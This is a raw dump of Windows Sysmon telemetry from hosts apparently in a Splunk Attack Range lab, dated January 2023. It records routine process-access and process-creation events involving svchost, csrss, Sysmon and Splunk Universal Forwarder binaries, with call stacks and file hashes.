12:20:29.881{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016058Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.881{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016057Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.881{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016056Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.881{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016055Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.880{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016054Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.880{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E40D-63C7-F601-00000000B002}1896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016053Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.880{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E40D-63C7-F601-00000000B002}1896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016052Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.880{E5A8D418-E40D-63C7-F601-00000000B002}1896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016051Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.872{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E60DA236741619A6223F3AACE66BEEF7,SHA256=563B62F45ADBC681423A43C2D29F5503EC4E38B1F11BD9E3F6C7E5067FE6D28B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016050Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E40D-63C7-F501-00000000B002}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016049Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016048Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016047Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016046Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016045Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016044Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016043Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016042Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016041Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016040Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E40D-63C7-F501-00000000B002}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016039Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.216{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E40D-63C7-F501-00000000B002}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016038Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:29.217{E5A8D418-E40D-63C7-F501-00000000B002}3712C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000041325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.895{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E40D-63C7-1A06-00000000AF02}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.895{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.895{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.895{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.895{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows